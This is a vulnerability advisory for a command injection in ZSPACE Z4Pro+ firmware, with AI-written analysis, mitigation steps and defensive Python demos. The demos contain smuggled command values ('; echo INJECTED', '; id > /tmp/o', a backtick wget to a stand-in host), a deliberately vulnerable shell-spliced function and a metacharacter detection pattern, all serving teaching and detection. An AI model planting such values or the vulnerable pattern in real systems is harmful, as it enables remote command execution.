
ZSPACE Z4Pro+ Firmware CVE-2025-15132

LOW
Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') (CWE-74)
2025-12-28 cna@vuldb.com
2.1
CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
2.1 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Subsequent System Impact (SC/SI/SA)
None (CVSS 4.0 has no Scope metric; the S:X at the end of the vector is the undefined Safety supplemental metric)

Lifecycle Timeline

1
Analysis Generated
Apr 29, 2026 - 01:44 vuln.today

Description (CVE.org)

A vulnerability was determined in ZSPACE Z4Pro+ 1.0.0440024. The affected element is the function zfilev2_api_open of the file /v2/file/safe/open of the component HTTP POST Request Handler. This manipulation causes command injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure.

Analysis (AI)

Command injection in ZSPACE Z4Pro+ 1.0.0440024 via the /v2/file/safe/open HTTP POST endpoint lets an authenticated remote attacker execute arbitrary commands on the device. The flaw is in the zfilev2_api_open function, and exploit code has been published. NVD's vector rates the confidentiality, integrity and availability impact on the device itself as Low with no impact on subsequent systems (SC:N/SI:N/SA:N), and the EPSS score of 0.38% (59th percentile) suggests limited observed exploitation so far. Those Low ratings are the vector's assessment only; the description says nothing about which user the handler runs as, so for triage treat an authenticated path to arbitrary command execution on an embedded device as a potential full-device compromise until the vendor states otherwise.

Technical Context (AI)

The vulnerability exists in the HTTP POST request handler for the /v2/file/safe/open API endpoint in ZSPACE Z4Pro+ firmware. The assigned weakness is CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component), which is the general injection class; OS command injection specifically is its child CWE-78. Request input reaching zfilev2_api_open is not sanitized before it is used to build or run a command. ZSPACE Z4Pro+ is an embedded device running proprietary firmware, and the endpoint name suggests it handles file operations. An authenticated user can therefore break out of the intended command and run arbitrary shell commands. CVSS 4.0 has no Scope metric; SC:N/SI:N/SA:N in the vector mean NVD assessed no impact on systems beyond the device, which says nothing about the privileges the injected commands run with.
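The injection pattern described above, as an added illustration that is not the Z4Pro+ firmware's code: the real handler is native and its underlying command and parameter name are not documented in the advisory, so a file name handed to `cat` stands in for whatever zfilev2_api_open does. The vulnerable function splices the request value into a command line that a shell parses; the hardened one first confines the value to a regular file under an allowed root and then passes it as a single argv element, so no shell ever sees it. The sandbox directory, sample file and payload are constructed for the demo.

```python
import os
import subprocess
import tempfile
from typing import Optional, Tuple

# Constructed sandbox directory standing in for the device's file store.
ROOT = os.path.realpath(tempfile.mkdtemp(prefix="zfile-demo-"))
SAMPLE = os.path.join(ROOT, "report.txt")
with open(SAMPLE, "w") as fh:
    fh.write("sample report\n")

# Constructed attacker value: a legitimate path with a shell command appended.
PAYLOAD = SAMPLE + "; echo INJECTED"


def vulnerable_open(path: str) -> str:
    """Vulnerable pattern (assumed, not the real zfilev2_api_open): the
    request value is spliced into a command line that /bin/sh parses."""
    cmd = "cat " + path
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def confine(path: str) -> Optional[str]:
    """Return the canonical path if it names a regular file under ROOT,
    otherwise None. Resolving first defeats '..' and symlink escapes."""
    if not path.startswith("/") or "\x00" in path:
        return None
    real = os.path.realpath(path)
    if os.path.commonpath([ROOT, real]) != ROOT:
        return None
    if not os.path.isfile(real):
        return None
    return real


def hardened_open(path: str) -> Tuple[bool, str]:
    """Hardened form: validate, then pass the value as one argv element so
    metacharacters are just bytes in a file name, never shell syntax."""
    real = confine(path)
    if real is None:
        return False, "rejected"
    proc = subprocess.run(["cat", real], capture_output=True, text=True)
    return proc.returncode == 0, proc.stdout


if __name__ == "__main__":
    print(repr(vulnerable_open(PAYLOAD)))  # appended command ran
    print(hardened_open(PAYLOAD))          # (False, 'rejected')
```

The argv form alone would already stop the injection (`cat` would simply fail on a file called `report.txt; echo INJECTED`); the confinement check is what keeps the same endpoint from turning into an arbitrary file read once the shell is gone.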

Remediation (AI)

No vendor-released patch has been identified at the time of this analysis. The description says the vendor (ZSPACE) was contacted early about the disclosure, but the references do not confirm patch availability. Until a fix ships:

1. Restrict network access to the device's HTTP interface, and the /v2/file/safe/open endpoint in particular, to trusted internal networks, with firewall rules denying untrusted external access. Authentication is required to exploit the flaw, but default or shared credentials are common on appliances, so do not rely on it alone.
2. Audit the accounts that can authenticate to the Z4Pro+ and revoke unnecessary access.
3. Log all HTTP POST requests to /v2/file/safe/open and flag bodies whose values contain shell metacharacters (; | & ` $( ) && || and newlines) after URL- and JSON-decoding them, so that percent-encoded payloads are not missed; retain the logs for forensic review.
4. When ZSPACE publishes firmware updates, test them in a non-production environment and then patch promptly.

Network segmentation is the critical compensating control while no patch exists: isolate Z4Pro+ devices on a restricted management VLAN. Contact ZSPACE directly for patch availability and timeline and watch the ZSPACE support portal. The GitHub issue cited as a reference (https://github.com/LX-66-LX/cve/issues/2) is the public disclosure of the finding, not a vendor channel, so fixes should not be expected there.
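Remediation step 3, as added example detection logic written here and not taken from the advisory or from ZSPACE. The log format, the parameter name `path` and the form/JSON body encodings are assumptions, since the advisory does not document the endpoint's request format; the sample log lines are constructed. The scanner decodes each body into the strings the handler would actually see before matching, which is what catches the percent-encoded `%3B` on the second line.

```python
import json
import re
from urllib.parse import parse_qs, unquote_plus

TARGET = "/v2/file/safe/open"
# Characters that let a value escape a shell word; none belong in a file path.
META = re.compile(r"[;&|`$(){}<>\r\n]")

# Constructed sample log: tab-separated time, client, method, path, raw body.
# Field layout, the "path" parameter and the body encodings are assumptions.
SAMPLE_LOG = """\
2025-12-28T10:00:01Z\t10.0.0.5\tPOST\t/v2/file/safe/open\tpath=%2Fdata%2Freport.txt
2025-12-28T10:00:02Z\t10.0.0.9\tPOST\t/v2/file/safe/open\tpath=%2Fdata%2Fx%3B+id+%3E+%2Ftmp%2Fo
2025-12-28T10:00:03Z\t10.0.0.9\tPOST\t/v2/file/safe/open\t{"path": "/data/y`wget http://h/a`"}
2025-12-28T10:00:04Z\t10.0.0.7\tGET\t/v2/file/safe/open\t
2025-12-28T10:00:05Z\t10.0.0.7\tPOST\t/v2/other\tname=a%3Bb
"""


def _leaves(obj):
    """Yield every scalar inside a decoded JSON document."""
    if isinstance(obj, dict):
        for v in obj.values():
            yield from _leaves(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from _leaves(v)
    else:
        yield obj


def body_values(body: str) -> list:
    """Decode a request body into the strings the handler would receive.
    Handles JSON and form encoding; anything else is returned decoded raw."""
    body = body.strip()
    if not body:
        return []
    if body.startswith("{") or body.startswith("["):
        try:
            return [str(v) for v in _leaves(json.loads(body))]
        except ValueError:
            return [body]
    parsed = parse_qs(body, keep_blank_values=True)
    if parsed:
        return [v for values in parsed.values() for v in values]
    return [unquote_plus(body)]


def scan(log_text: str) -> list:
    """One alert per POST to TARGET whose decoded body carries a shell
    metacharacter. Form '&' separators are split off before matching, so
    only a '&' inside a value (e.g. sent as %26) is reported."""
    alerts = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        fields = line.split("\t")
        if len(fields) != 5:
            continue
        ts, client, method, path, body = fields
        if method != "POST" or path != TARGET:
            continue
        for value in body_values(body):
            hit = META.search(value)
            if hit:
                alerts.append({"line": lineno, "time": ts, "client": client,
                               "char": hit.group(0), "value": value})
                break
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"line {a['line']} {a['client']} metachar {a['char']!r} in {a['value']!r}")
```

Run against real device logs this should be narrowed to the device's actual parameter names once they are known; matching every decoded value is deliberately broad for the interim, and a benign file name will not normally contain any of the characters in META.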

CVE-2025-15132 vulnerability details – vuln.today
